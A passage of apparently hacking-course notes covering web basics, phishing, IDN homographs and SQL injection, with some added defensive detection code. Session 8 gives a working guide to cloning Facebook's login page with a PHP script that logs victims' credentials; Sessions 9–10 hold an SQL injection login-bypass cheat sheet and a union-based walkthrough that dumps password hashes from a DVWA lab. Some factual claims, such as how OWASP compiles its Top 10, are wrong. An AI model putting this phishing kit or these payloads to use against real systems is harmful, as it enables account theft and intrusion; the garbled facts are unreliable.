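  TCP    192.168.0.28:49731     203.0.113.5:4444       ESTABLISHED     5120
  TCP    192.168.0.28:49802     198.51.100.20:443      ESTABLISHED     6872
  UDP    0.0.0.0:5353           *:*                                    1204
"""

# Remote ports considered normal for outbound traffic (assumed allowlist).
ALLOWED_REMOTE_PORTS = {22, 25, 80, 443, 587, 993}
# Address ranges treated as "inside": RFC 1918, loopback, link-local (assumed).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]


@dataclass
class Conn:
    proto: str
    local: str
    remote: str
    state: str
    pid: int


def split_endpoint(endpoint: str):
    """'203.0.113.5:4444' -> ('203.0.113.5', 4444); '*:*' -> ('*', None);
    '[::]:135' -> ('::', 135)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else None)


def parse_netstat(text: str) -> list:
    """Turn the netstat table into Conn records, skipping header/blank lines."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        if parts[0] == "TCP" and len(parts) == 5:
            proto, local, remote, state, pid = parts
        elif parts[0] == "UDP" and len(parts) == 4:
            proto, local, remote, pid = parts      # UDP rows have no State column
            state = ""
        else:
            continue
        conns.append(Conn(proto, local, remote, state, int(pid)))
    return conns


def is_internal(host: str) -> bool:
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True                               # '*' or a hostname: not scored here
    return any(ip in net for net in INTERNAL_NETS)


def suspicious(conns: list) -> list:
    """Established, to an external host, on a port outside the allowlist."""
    flagged = []
    for c in conns:
        if c.state != "ESTABLISHED":
            continue
        host, port = split_endpoint(c.remote)
        if is_internal(host) or port in ALLOWED_REMOTE_PORTS:
            continue
        flagged.append(c)
    return flagged


def kill_commands(conns: list) -> list:
    """The Windows command that terminates the owning process of each flagged connection."""
    return [f"taskkill /PID {c.pid} /F" for c in conns]


if __name__ == "__main__":
    bad = suspicious(parse_netstat(SAMPLE_NETSTAT))
    for c in bad:
        print(f"{c.proto} {c.local} -> {c.remote} {c.state} PID {c.pid}")
    print("\n".join(kill_commands(bad)))
```

- On the sample this flags only PID 5120 (192.168.0.28:49731 -> 203.0.113.5:4444); the HTTPS connection on 443 passes. Killing the process is the quick fix; the persistence mechanism (startup entry, service, scheduled task) still has to be found with the checks listed above.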
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 7
- =========
- Introduction to web Architecture and Components
- -----------------------------------------------
- 1. Domain Name
- ---------------
- godaddy.com
- hostgator.com
- 2. Hosting Space
- ----------------
- 000webhost.com
- 3. Server
- ---------
- They are the software (and the hardware it runs on) used to run other programs: server-side programs such as PHP scripts.
- It manages requests and responses.
- When a user enters a URL in the address bar ---> a request is generated
- When the user receives the data -> a response is received
- Web servers are commonly of 2 kinds:
- 1. Windows based server
- IIS --> Internet Information Services
- 2. Linux based servers
- Apache | Tomcat (Apache also runs on Windows; Tomcat is a Java servlet container)
- 4. Database
- -----------
- It is known as the backbone. It stores the data of the web site or web application, in tables.
- Database --> Tables --> Columns --> Rows (Data)
- Databases are commonly paired as:
- 1. Windows --> MSSQL
- 2. Linux --> MySQL (both can run on either OS)
- 5. Web Technologies
- -------------------
- These are the programming or scripting languages in which our web site or web application is built.
- They are also divided into 2 types
- 1. Client Side | Front End Scripting Language
- 2. Server Side | Back End Scripting Language
- 1. Client Side Scripting
- These provide the UI of the web site or web application: what a user sees in the browser.
- These require just a browser to run.
- HTML (with CSS and JavaScript)
- 2. Server Side Scripting
- These are what works on the back end. They require a server to run.
- PHP
- Windows --> ASP.NET
- Linux --> PHP
- Windows --> IIS + MSSQL + ASP.NET ---> costs money (licences and hosting)
- Linux --> Apache|Tomcat + MySQL + PHP ---> costs money (hosting)
- Local Hosting Server
- ====================
- By using these free third-party packages, you can launch and host the application or web site on the LAN and run the testing there. There is no money involved; I can test the application for free.
- 1. Windows Based Server --> WAMPP
- W --> Windows
- A --> Apache
- M --> MySQL
- P --> Perl
- P --> Php
- 2. Linux Based Server --> LAMPP
- L --> Linux
- A --> Apache
- M --> MySQL
- P --> Perl
- P --> Php
- 3. Cross Platform Based Server --> XAMPP
- X --> Cross Platform
- A --> Apache
- M --> MySQL
- P --> Perl
- P --> Php
- After Installing XAMPP
- ======================
- 1. Apache
- 2. MySQL
- we need to start these two services.
- How To Access XAMPP Server
- --------------------------
- There are 3 ways to reach the XAMPP server. Open the browser and enter:
- 1. localhost
- 2. 127.0.0.1
- 3. The hosting system's LAN IP address (this also works from other devices on the LAN)
- Web Security Misconfigurations
- ------------------------------
- Common myths (none of these alone makes you secure):
- 1. "If I have a good firewall, I am secure."
- 2. "If I have a good IDS and IPS, I am secure."
- 3. "If the web site or web application uses HTTPS, I am secure." (HTTPS only protects data in transit; the application itself can still be vulnerable.)
- HTML
- ====
- Hyper Text Markup Language
- --------------------------
- Front-end language, which requires a browser to run.
- 1. HTML --> Everything on the front end is written inside this tag.
- <html>
- xxxxxx
- xxxxxx
- xxxxxx
- </html>
- 2. Head --> Contains the meta data
- Links of styles, title, date etc etc
- <head>
- xxxxxx
- xxxxxx
- xxxxxx
- xxxxxx
- </head>
- 3. title --> to provide the title to the tab
- <title>Name_Of_The_Title</title>
- 4. Body --> Contains the whole of the visible content of the web site or web application. It comes after the head is closed.
- <body>
- xxxxxx
- xxxxxx
- xxxxxx
- </body>
- 5. Paragraph -->
- <p>.....
- ........
- ........
- ........
- </p>
- 6. Break
- <br> --> It is a single tag. It does not need to be closed.
- 7. Heading
- There are 6 types of heading tag
- h1
- h2
- h3
- h4
- h5
- h6
- as the number increases, the font size decreases.
- 8. anchor --> to provide the hyper link to anything
- <a href="#">............</a>
- 9. Image
- <img src="..."> --> single tag, it does not need to be closed
- 10. Form
- <form action="page to redirect to after clicking the submit button" method="GET|POST">
- </form>
- 11. Input
- <input type="text|number|date|password" id="Unique ID" name="Name Of the Element">
- 12. iframe
- <iframe src="http://www.lucideus.com"></iframe>
- ==========
- pagee.html
- ==========
- <html>
- <head>
- <title>CII</title>
- </head>
- <body>
- <h1>Grade 2<br>=======</h1>
- <h2>Session 1<br>---------</h2>
- <h3><a href="http://www.lucideus.com">Introduction To Cryptography</a><br>----------------------------</h3>
- <p>
- Cryptography --> Conversion of text into another form, which is readable but
- not understandable.
- <br>
- Conversion of plain text into an encrypted text via an algorithm which uses a
- key; after transmission, decryption of the encrypted text back into the plain text
- via the same algorithm and the key.
- <br>
- Plain Text --> It is normal text, as typed by the user, which is
- readable and understandable to everyone.<br>
- Cipher Text --> Encrypted text, which is the output of the encryption.<br>
- Encryption --> Process of converting plain text into cipher text; the result is
- readable but not understandable.<br>
- Decryption --> Reverse of encryption: conversion of cipher text back into plain
- text.<br>
- Algorithm --> It is the procedure used to encrypt plain text into cipher text
- and decrypt cipher text back into plain text.<br>
- Key --> It is the secret value the algorithm uses; encryption and decryption are
- possible only with this key.<br>
- </p>
- <img src="naruto.jpg" height="700">
- <!-- Demo only: method="GET" puts the password into the URL and browser history; real login forms use POST over HTTPS. -->
- <form action="mera.html" method="GET">
- Username :<input type="text" id="uname" name="uname"><br>
- Password :<input type="password" id="pass" name="pass"><br>
- <input type="submit" id="but">
- </form>
- </body>
- </html>
- =========
- mera.html
- =========
- <html>
- <head>
- <title>Second Page</title>
- </head>
- <body>
- <p>
- This is my second page</p>
- <iframe src="http://www.lucideus.com"></iframe><br>
- <img src="goku.jpg" height="500">
- </body>
- </html>
- PHP Basics
- ==========
- Server Side Scripting Language
- <?php
- xxxx
- xxxx
- xxxx
- xxxx
- ?>
- <?php ---> Start of PHP code
- ?> ---> End of php code
- echo "Hello Guys"; --> prints text into the page (statements end with a semicolon)
- $var --> var is name of variable
- $hack --> Hack is name of variable
- $ ---> used to declare a variable
- $_POST
- $_GET
- =========
- CALL.html
- =========
- <html>
- <head>
- <title>Calculator</title>
- </head>
- <body>
- <form action="calc.php" method="post">
- First Value : <input type="text" id="first" name="first"><br>
- Second Value : <input type="text" id="second" name="second"><br>
- <input type="radio" name="group1" id="add" value="add" checked="true">ADD<br>
- <input type="radio" name="group1" id="subtract" value="subtract">SUBTRACT<br>
- <button type="submit" id="answer" value="answer">Calculate</button>
- </form>
- </body>
- </html>
- ========
- calc.php
- ========
- <html>
- <head>
- <title>Jawab</title>
- </head>
- <body>
- <p>
- The Answer is:
- <?php
- // Read the fields only if they were sent, and accept numbers only
- // (avoids undefined-index warnings and string-to-number juggling).
- $first  = isset($_POST['first'])  && is_numeric($_POST['first'])  ? (float) $_POST['first']  : null;
- $second = isset($_POST['second']) && is_numeric($_POST['second']) ? (float) $_POST['second'] : null;
- $op = $_POST['group1'] ?? '';
- if ($first === null || $second === null) {
-     echo "Please enter two numbers.";
- } elseif ($op == 'add') {
-     echo $first + $second;
- } elseif ($op == 'subtract') {
-     echo $first - $second;
- } else {
-     echo "Unknown operation.";
- }
- ?>
- </p>
- </body>
- </html>
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 8
- =========
- Phishing
- --------
- It is a technique in which an attacker creates a fake page or web site which looks completely authentic and genuine, but is not. He deploys it and tricks people into entering their credentials.
- 1. Spear Phishing
- 2. Vector Phishing | Credential Harvester
- 1. Spear Phishing
- -----------------
- Targeting a single individual, or a crowd of people with a common interest. Target specific.
- 2. Credential Harvester
- -----------------------
- It is not target specific. Anyone can come and enter their credentials; the attacker just collects the credentials of the crowd for his own purpose.
- Create Facebook's Phishing Page
- ===============================
- 1. Open Your Browser
- 2. Goto www.facebook.com
- 3. Right Click on the login page ---> view page source
- 4. Select all ---> copy
- 5. Open notepad and paste the whole code
- 6. Scroll to the very top of the code.
- 7. Ctrl+F ---> action=
- action="https://www.facebook.com/login.php?login_attempt=1&lwv=110"
- 8. In the action parameter
- https://www.facebook.com/login.php?login_attempt=1&lwv=110
- Replace it with fish.php (keep method="post", so the form still sends its fields to the script)
- fish.php
- ========
- <?php
- header('Location: https://www.facebook.com');   // send the victim on to the real site
- $handle = fopen("coffee.txt", "a");             // append mode: earlier entries are kept
- foreach ($_POST as $variable => $value) {        // every field the login form posted
-     fwrite($handle, $variable);
-     fwrite($handle, "=");
-     fwrite($handle, $value);
-     fwrite($handle, "\n");
- }
- fwrite($handle, "\n");                           // blank line between victims
- fclose($handle);
- exit;
- ?>
- Understanding The Code
- ======================
- <?php ---> start of the php code
- header ('Location: https://www.facebook.com');
- When the PHP code has finished, redirect the user to https://www.facebook.com (the header is only sent when the script ends, so the file writing below still runs first)
- $handle = fopen("coffee.txt","a");
- $handle ---> Variable
- fopen --> to open a file
- It will open a file, coffee.txt
- When we open a file, I need to pass an attribute, which says in which mode the file should open. There are 3 major attributes
- 1. Read --> r
- This attribute is used for just reading the content of the file.
- 2. Write -> w
- This attribute is used to write content into the file.
- 1. If there is no file with the name we passed, it will create a new file with that name.
- 2. If there is a file with that name and there is data inside it, it will delete all the data and start writing the new data from the beginning (overwrite).
- 3. Append-> a
- It is the same as write, but it never deletes data; it continues writing the new data at the end of the same file.
- foreach($_POST as $variable => $value)
- It is a for loop in PHP. It says: as long as data is coming to me via the POST method, keep this loop running (it visits every field submitted in the POST request, one at a time).
- $variable => $value
- Phone or email => abc.cyb@gmail.com
- fwrite($handle, $variable); --> 1
- fwrite($handle, "="); ---> 2
- fwrite($handle, $value); ---> 3
- fwrite($handle, "\n"); ---> 4
- fwrite --> to write data into the file
- fwrite($handle, $variable);
- $handle ---> specify the file in which we want to write
- $variable --> data which is to be stored in the file
- 1 2 3
- email or phone = store the value entered by the user
- 4 ---> it will enter a new line and start from the beginning of the next line
- fclose($handle);
- It means to close the open file ---> coffee.txt
- exit;
- To stop the execution of the code and redirect the user to the site specified in the header
- ?> --> close of php code
- IDN Homographic Attack
- ======================
- There are many languages in the world, and among those languages there are many characters which look similar to English characters.
- To the human eye those similar characters show no difference, but to a computer they do differ, because each has its own character code.
- а, с, е, о, р, х and у --> Russian
- a, c, e, o, p, x and y --> English
- deepika Padukone --> English
- dеерikа раdukоnе --> Cyrillic + English
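- A check for the look-alike letters above, added here as an example that is not part of the original notes: it flags a host name label that mixes Latin letters with the listed Cyrillic confusables, or that is built wholly from them, and shows the Punycode (xn--) form a resolver actually sees. The function names and the sample host names are this example's own.

```python
import unicodedata

# Cyrillic letters that look like Latin letters: the seven pairs from the notes
# (U+0430 а, U+0441 с, U+0435 е, U+043E о, U+0440 р, U+0445 х, U+0443 у).
CONFUSABLES = {
    "\u0430": "a", "\u0441": "c", "\u0435": "e", "\u043e": "o",
    "\u0440": "p", "\u0445": "x", "\u0443": "y",
}


def script_of(ch):
    """First word of the Unicode name ('LATIN', 'CYRILLIC', ...), 'OTHER' if unnamed."""
    name = unicodedata.name(ch, "")
    return name.split(" ")[0] if name else "OTHER"


def analyse_label(label):
    """Return (set of scripts used by the letters, Latin 'skeleton' of the label).

    The skeleton replaces each listed Cyrillic confusable by the Latin letter it
    imitates, so 'dеерikа' (mixed) has the skeleton 'deepika'.
    """
    scripts = set()
    skeleton = []
    for ch in label.lower():
        if ch.isalpha():
            scripts.add(script_of(ch))
        skeleton.append(CONFUSABLES.get(ch, ch))
    return scripts, "".join(skeleton)


def is_suspicious(hostname):
    """True if any label mixes scripts, or only reads as Latin after mapping confusables.

    A label written in one non-Latin script with no confusables (a genuine
    internationalised name) passes; a label whose letters all imitate Latin
    ones (e.g. Cyrillic 'сору' for 'copy') does not.
    """
    for label in hostname.split("."):
        scripts, skeleton = analyse_label(label)
        if len(scripts) > 1:
            return True
        if skeleton != label.lower():
            return True
    return False


def to_punycode(hostname):
    """The ASCII form the resolver sees; Python's built-in idna codec encodes it."""
    return hostname.encode("idna").decode("ascii")


if __name__ == "__main__":
    # Constructed sample names: the Latin one and a Cyrillic/Latin mix.
    for host in ("deepikapadukone.com", "d\u0435\u0435\u0440ik\u0430.com"):
        print(host, to_punycode(host), "suspicious" if is_suspicious(host) else "ok")
```

- The Punycode form is the one to compare in logs and certificate subject names: two names that render identically in a browser bar never share the same xn-- label.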
- Case Study - Must Read
- ======================
- https://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html
- Social Engineering
- ==================
- To bluff someone in order to take their sensitive data. It is hacking without coding: human mind hacking. An attacker can retrieve the data or make others do his dirty work.
- Fake Mails
- ==========
- Sending ----> https://emkei.cz/
- https://getgophish.com/
- https://www.youtube.com/watch?v=knc6Iq-hNcw&t=114s
- Receiving ----> www.temp-mail.org
- haveibeenpwned.com
- https://howsecureismypassword.net/
- Email Tracing and Tracking
- ==========================
- https://grabify.link/ --> Try it yourself
- http://www.fuglekos.com/ip-grabber/index.html -->
- http://whoreadme.com
- Email Encryption
- ================
- End-to-end encryption.
- encipher.it
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 9
- =========
- Introduction to Vulnerability Assessment and Penetration Testing
- ----------------------------------------------------------------
- VAPT --> Vulnerability Assessment and Penetration Testing
- V --> Vulnerability
- Loopholes, weak security, security misconfiguration: the places from where an attacker can intrude and compromise your system.
- A --> Assessment
- To scan for the Vulnerability.
- P --> Penetration
- To breach into the system using the above vulnerability; to hack into or compromise the system.
- T --> Testing
- To generate the report and pass it down. To test the above vulnerability and create a report for the same.
- VA --> Vulnerability Assessment
- To scan the web application and to report the Vulnerability
- PT --> Penetration Testing
- To breach into the system and report about those vulnerabilities.
- VAPT --> Vulnerability Assessment and Penetration Testing
- When we talk about web application VAPT
- ========================================
- OWASP
- =====
- Open Web Application Security Project
- -------------------------------------
- It is a non-profit charitable organisation which works towards the security of web applications. They gather information from all around the globe, through a CTF initiative.
- They openly challenge the whole hacking community to hack into the online system and capture the flag; in return they provide a bounty. They gather the logs of the attacks performed in the CTF.
- After gathering all the logs, they analyse them and categorise the attacks accordingly.
- They release a list of 10 attacks.
- OWASP TOP 10. --> top 10 attacks.
- 1. Injection
- 2. XSS --> Cross Site Scripting
- 3. CSRF --> Cross Site Request Forgery
- 4. IDOR --> Insecure Direct Object References
- 5. Sensitive Data Exposure
- 6. Missing Function Level Access Control
- 7. Broken Authentication and Session Management
- 8. Unvalidated Redirects and Forwards
- 9. Security Misconfigurations
- 10. Using Components with known Vulnerabilities
- OWASP 2013 --> Stable
- OWASP 2017 --> Data sufficient
- https://www.owasp.org/images/7/72/OWASP_Top_10-2017_(en).pdf.pdf
- https://cybermap.kaspersky.com/
- https://www.fireeye.com/cyber-map/threat-map.html
- DBMS
- ====
- DataBase Management System
- --------------------------
- Where, how, when and which data is supposed to be stored: in which database, in which table, in which column.
- DBA --> Database Administrator
- The administrator of the database, who manages the whole environment's databases. A DBA needs complete knowledge of a programming language --> SQL
- SQL --> Structured Query Language.
- This is the programming language used by the DBA or any user to interact with the database.
- Source --> Delhi
- Destination --> Jalandhar
- Date --> 10/6/2018
- Class -> 2T
- Select trains from database where source="Delhi" and destination="Jalandhar" having class="2T" on date=" 10/06/2018"
- Queries
- =======
- 1. Insert
- Insert into <table_name>(Column_Name) VALUES(Values to be inserted);
- INSERT INTO `info`(`Name`, `Salary`, `Address`, `Gen`) VALUES ('Prashant', 10000, 'Roshan Garden Najafgarh', 'M');
- 2. Select
- Select * from <table_name>;
- Select * from info;
- 3. UPDATE
- UPDATE <table_name> SET <column>=<new value> WHERE <condition>;
- UPDATE info SET Salary=30000 where Name="Abhijeet Singh";
- 4. Where
- It is a condition
- Select * from info where salary > 15000;
- Select * from info where name like "A%";
- 5. Delete
- DELETE from info WHERE Name="Abhijeet Singh";
- 6. AND
- SELECT * FROM `info` WHERE salary>=20000 and Gen='M';
- 7. Create
- Create table <table_name>(columns_name data_Type Length);
- CREATE table training(Name Text(20), Age int(3), Gender Text(1));
- 8. Order By
- It will arrange the data into either ascending order or in descending order
- SELECT * FROM `training` ORDER BY Name;
- 9. Group By
- To group the data
- SELECT * FROM `training` GROUP by Gender;
- 10. UNION
- SELECT name from info UNION select name from training;
- SELECT name,gen,salary,address from info UNION SELECT name,gender,age,null FROM training;
- 11. Information_schema -->Meta database
- SQL Injection
- =============
- Authentication Bypass
- ---------------------
- To bypass the authentication on any login form and gain access as the administrator.
- There are 4 types of authentication
- 1. Basic Authentication
- 2. Integrated Authentication
- 3. Digest Authentication
- 4. Form Based Authentication
- Logic Gates
- ===========
- AND Gate --> If any of the values is false, then the answer will be false
- 0 and 0 = 0
- 0 and 1 = 0
- 1 and 0 = 0
- 1 and 1 = 1
- OR --> If any of the value is true, then the answer will be true
- 0 or 0 = 0
- 0 or 1 = 1
- 1 or 0 = 1
- 1 or 1 = 1
- 1 ---> True ---> Administrator
- ' ---> Single inverted Comma ---> Use to break the SQL query
- 1'or'1'='1
- select '1'or'1'='1'
- Username --> 1'or'1'='1 always true
- Password --> 1'or'1'='1 always true
- Administrator Login
- x'or'x'='x ---> true
- Cupons| Promo Code ---> 1'or'1'='1
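- The bypass above, seen from the defender's side as an added example that is not from the notes: the same login check built by string concatenation (the form the `1'or'1'='1` and `admin' --` inputs defeat) beside its parameterised form, run against a constructed in-memory SQLite table. `login_vulnerable`, `login_safe` and the table contents are this example's own assumptions.

```python
import sqlite3


def make_db():
    """Constructed sample table: two users, plain-text passwords for brevity."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO users VALUES ('admin', 's3cret'), ('gordonb', 'abc123')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the SQL by concatenation, so a quote in the input becomes SQL.

    With username and password both 1'or'1'='1 the statement reads
      WHERE username='1'or'1'='1' AND password='1'or'1'='1'
    which is true for every row, so the first row (admin) is returned.
    With admin' -- the rest of the WHERE clause is commented out.
    """
    sql = (
        "SELECT username FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised: the values travel separately from the SQL text, so the
    database compares the whole input, quotes and all, as a plain string."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for user, pwd in (("admin", "s3cret"), ("1'or'1'='1", "1'or'1'='1"), ("admin' --", "x")):
        print(repr(user), "vulnerable:", login_vulnerable(db, user, pwd),
              "| safe:", login_safe(db, user, pwd))
```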
- Cheat sheet
- ===========
- or 1=1
- or 1=1--
- or 1=1#
- or 1=1/*
- admin' --
- admin' #
- admin'/*
- admin' or '1'='1
- admin' or '1'='1'--
- admin' or '1'='1'#
- admin' or '1'='1'/*
- admin'or 1=1 or ''='
- admin' or 1=1
- admin' or 1=1--
- admin' or 1=1#
- admin' or 1=1/*
- admin') or ('1'='1
- admin') or ('1'='1'--
- admin') or ('1'='1'#
- admin') or ('1'='1'/*
- admin') or '1'='1
- admin') or '1'='1'--
- admin') or '1'='1'#
- admin') or '1'='1'/*
- 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
- admin" --
- admin" #
- admin"/*
- admin" or "1"="1
- admin" or "1"="1"--
- admin" or "1"="1"#
- admin" or "1"="1"/*
- admin"or 1=1 or ""="
- admin" or 1=1
- admin" or 1=1--
- admin" or 1=1#
- admin" or 1=1/*
- admin") or ("1"="1
- admin") or ("1"="1"--
- admin") or ("1"="1"#
- admin") or ("1"="1"/*
- admin") or "1"="1
- admin") or "1"="1"--
- admin") or "1"="1"#
- admin") or "1"="1"/*
- 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
- LVS setup
- =========
- Lucideus Vulnerable Simulator
- =============================
- DVWA --> Damn Vulnerable Web Application
- ----------------------------------------
- Open Source
- LVS_1.zip
- 1. Copy the zip file
- 2. Paste it in C:\xampp\htdocs
- 3. Extract the zip file
- LVS_1
- 4. Start the xampp server
- Apache
- MySQL
- 5. Start the browser
- 127.0.0.1/lvs_1
- 6. Click on the link --> lvs111
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 10
- ==========
- Insecure Direct Object References
- ---------------------------------
- A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
- www.bank.com/aofn/akjf.php?id=12 ---> Account1
- www.bank.com/aofn/akjf.php?id=11 ---> Account2
- www.bank.com/aofn/akjf.php?id=10 ---> Account3
- If I change the id value to another id value and can get access to another account, it is considered an Insecure Direct Object Reference.
- http://127.0.0.1/wave1/wave1/insecure/myaccount.php?Id=1
- User ID = 1
- Username = Admin
- Password= password
- If I change the value of .php?Id=1 to .php?Id=2, then I can have the access of another account whose ID is 2
- Oyorooms.com/afogn/adifn.php?ID=abhijeet.php
- Oyorooms.com/afogn/adifn.php?ID=admin.php
- id = 1 ---> 1 represents a token containing a value of --> Username, password and other information.
- Get Parameter
- -------------
- php?Id=1 -->
- Something = something
- Sensitive Data Exposure
- =======================
- Personal Data
- Credential Data
- Banking Data
- Economical Data
- Financial Data
- 1. When data is transmitted in the URL, that is, your credentials are transmitted via a GET parameter.
- username=user&password=pass&submit=submit
- 2. When data is stored in plain text form rather than in hashed or encrypted form.
- 3. When data is stored in a text file rather than in the database.
- Id Interest Gender Username Password
- -----------------------------------------------
- 1 Badminton Female admin Pa$$woRd
- 2 Football Male admin2 paSSwOrd
- Consider who can gain access to your sensitive data and any backups of that data. This includes the data at rest, in transit and even in your customers’ browsers. Include both external and internal threats. The Sensitive Data can be exposed in the plain text or in any hash format.
- DVWA
- ====
- Damn Vulnerable Web Application
- -------------------------------
- It is a web application which is vulnerable by default. This application is used for testing your skills and performing the web application attacks listed by OWASP.
- Could not connect to the database - please check the config file.
- 1. Goto C:\xampp\htdocs\dvwa\DVWA-1.0.8
- 2. Open the config folder
- 3. config.inc.php
- 4. $_DVWA = array();
- $_DVWA[ 'db_server' ] = 'localhost';
- $_DVWA[ 'db_database' ] = 'dvwa';
- $_DVWA[ 'db_user' ] = 'root';
- $_DVWA[ 'db_password' ] = 'p@ssw0rd';
- change the line --> $_DVWA[ 'db_password' ] = 'p@ssw0rd';
- $_DVWA[ 'db_password' ] = '';
- save the file
- Username:admin
- password:password
- SQL Injections
- ==============
- Where an attacker passes malicious SQL commands just to gain juicy information from the database.
- SQLi
- UNION BASED SQL INJECTION
- =========================
- Where an attacker uses the UNION command to collect the information and merge it into one table. He passes malicious commands and queries to the database to do so.
- DEMO
- ====
- DVWA ---> Security:Low
- SQL Injection
- Step 1
- ======
- To find 'GET' parameter.
- something=something
- php?id=something
- php?id=cat
- php?id=1
- php?id=query
- Either you click on some link of the web application|site or enter something in the search box.
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#
- Step 2
- ======
- To generate a SQL error, to break the query.
- 1
- 1'
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1'&Submit=Submit#
- You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
- 'select * from table '
- 'select * from table' '
- Step 3
- ======
- To count the number of columns, in the web application.
- For counting the number of columns, I will use order by
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
- Shows me data
- This query means that I am asking the database to arrange the data according to column number 1
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
- Shows me data
- This query means that I am asking the database to arrange the data according to column number 2
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
- Gives me error
- Unknown column '3' in 'order clause'
- This query means that I am asking the database to arrange the data according to column number 3
- But there is no column number 3 --> so it will generate an error
- order by n--+
- n starts from 1 and ends when I receive an error for the value of n
- --+ ---> To comment out
- if there is any data passed down after --+, it will not execute at all.
- There are 2 columns, in the database.
- Step 4
- ======
- To merge the data of all the columns, using UNION command.
- union select 1,2,...,n-1--+
- n=3
- union select 1,2--+
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#
- ID: 1' union select 1,2--
- First name: admin
- Surname: admin
- ID: 1' union select 1,2--
- First name: 1
- Surname: 2
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#
- database() --> database name
- version() --> Database Version Number
- ID: 1' union select database(),version()--
- First name: admin
- Surname: admin
- ID: 1' union select database(),version()--
- First name: dvwa
- Surname: 10.1.25-MariaDB
- Step 5
- ======
- To call the database's "mother" --> information_schema, for getting the information about the table names
- information_schema --> it is a meta table --> it contains the names of the tables and columns which are present in the database.
- information_schema.tables
- |-> It stores the names of all the tables in the database.
- union select table_name,2 from information_schema.tables--+
- or
- union select 1,table_name from information_schema.tables--+
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#
- Step 6
- ======
- I will again call the database's "mother" for the column names in the table named users
- information_schema
- information_schema.columns
- union select 1,column_name from information_schema.columns where table_name="users"--+
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: admin
- Surname: admin
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: user_id
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: first_name
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: last_name
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: user
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: password
- column name --> user_id
- first_name
- Last_name
- user
- password
- Step 7
- ======
- To retrieve data from the above tables and columns.
- DVWA --> Users --> (User_id,first_name,Last_name,user,Password)
- union select 1,group_concat(User_id,0x0a,first_name,0x0a,Last_name,0x0a,user,0x0a,Password,0x3a) from users--+
- 1
- admin
- admin
- admin
- 5f4dcc3b5aa765d61d8327deb882cf99
- 2
- Gordon
- Brown
- gordonb
- e99a18c428cb38d5f260853678922e03 --> abc123
- 3
- Hack
- Me
- 1337
- 8d3533d75ae2c3966d7e0d4fcc69216b --> charley
- 4
- Pablo
- Picasso
- pablo
- 0d107d09f5bbe40cade3de5c71e9e9b7
- 5
- Bob
- Smith
- smithy
- 5f4dcc3b5aa765d61d8327deb882cf99
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 11
- ==========
- ERROR BASED SQL INJECTION
- ==========================
- Error-based SQL injection is a type of SQL injection technique that makes the error message show data in the form of database errors instead of the SQL syntax errors used in union-based injection; it is for when we have a blind vulnerability that shows errors, so we can extract sensitive data from the database directly.
- Errors are very useful during the development of a web application, but they should be disabled on a live website, because errors always show internal sensitive data of the database.
- Error-based SQL injection works on the ASP technology (ASP.NET, ASPX), which is an open source server-side web application framework developed by Microsoft, using Microsoft MSSQL Server.
- TRUE CONDITION :
- ---------------
- Here 1 is True and 0 is False.
- AND GATE REPRESENTATION
- A | B | Resultant |
- ------------------------------|
- 0 | 0 | 0 |
- 0 | 1 | 0 |
